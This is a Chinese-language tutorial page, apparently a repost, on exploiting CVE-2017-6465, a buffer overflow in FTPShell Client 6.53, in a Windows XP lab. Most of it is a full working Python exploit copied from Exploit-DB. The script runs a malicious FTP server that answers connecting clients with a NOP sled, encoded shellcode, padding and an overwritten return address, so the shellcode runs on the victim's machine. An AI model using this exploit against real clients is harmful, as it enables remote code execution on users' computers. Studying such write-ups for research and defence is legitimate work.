首页 > 代码库 > CVE-2017-6465 FTPShell Client 6.53之缓冲区溢出利用
CVE-2017-6465 FTPShell Client 6.53之缓冲区溢出利用
0x00.前言
FTPShell是一款国外Windows平台下比较流行的FTP服务工具,截至本文客户端最新版6.53下载地址:http://www.ftpshell.com/downloadclient.htm#
实验环境:VMWare + WinXP SP3 EN
Vulnerable App 获取地址:http://www.ftpshell.com/downloadclient.htm#
0x01.利用
该缓冲区溢出漏洞发生在客户端与FTP服务端初始化认证连接阶段,首先实验环境下安装好 FTPShell Client 6.53
这里我们直接使用Explit-DB提供的python代码搭建一台恶意FTP服务器
1 # Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection 2 # Date: 2017-03-04 3 # Exploit Author: Peter Baris 4 # Vendor Homepage: http://www.saptech-erp.com.au 5 # Software Link: http://www.ftpshell.com/downloadclient.htm 6 # Version: Windows Server 2008 R2 x64 7 # Tested on: Windows Server 2008 R2 Standard x64 8 # CVE: CVE-2017-6465 9 # 2017-03-04: Software vendor notified10 # 2017-03-06: No reply11 # 2017-03-06: Publishing12 13 import socket14 import sys15 16 shell=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"17 "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"18 "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"19 "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"20 "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"21 "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37"22 "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48"23 "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"24 "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"25 "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"26 "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48"27 "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54"28 "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48"29 "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43"30 "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57"31 "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a"32 "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b"33 "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53"34 "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"35 "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49"36 "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"37 "\x4e\x36\x43\x46\x42\x50\x5a") #这里替换成弹出calc.exe的shellcode38 39 port = 2140 41 try:42 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)43 s.bind(("0.0.0.0", port)) #绑定本地21端口44 s.listen(5) #开启FTP服务监听45 print("[i] FTP server started on port: "+str(port)+"\r\n")46 except:47 print("[!] Failed to bind the server to port: "+str(port)+"\r\n")48 49 50 # 004b95dc in ftpshell.exe PUSH ESI ; RETN51 eip = "\xdc\x95\x4b" #该地址在WinXP SP3 EN中仍可使用52 nops = "\x90"*853 junk = "A"*(400-len(nops)-len(shell))54 buffer = nops + shell + junk + eip #构造出恶意Buffer结构55 56 while True:57 conn, addr = s.accept()58 conn.send(‘220 Welcome to your unfriendly FTP server\r\n‘)59 print(conn.recv(1024))60 conn.send("331 OK\r\n")61 print(conn.recv(1024))62 conn.send(‘230 OK\r\n‘)63 print(conn.recv(1024))64 conn.send(‘220 "‘+buffer+‘" is current directory\r\n‘) #发送恶意Buffer结构
执行脚本,启动服务
受害机中FTPShell客户端连接恶意FTP服务器,可以发现客户端立即报错,Shellcode被执行
注:本人并未在Win2008 SP2中实验过
0x02.参考链接
Exploit-db:https://www.exploit-db.com/exploits/41511/
CVE-2017-6465 FTPShell Client 6.53之缓冲区溢出利用
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。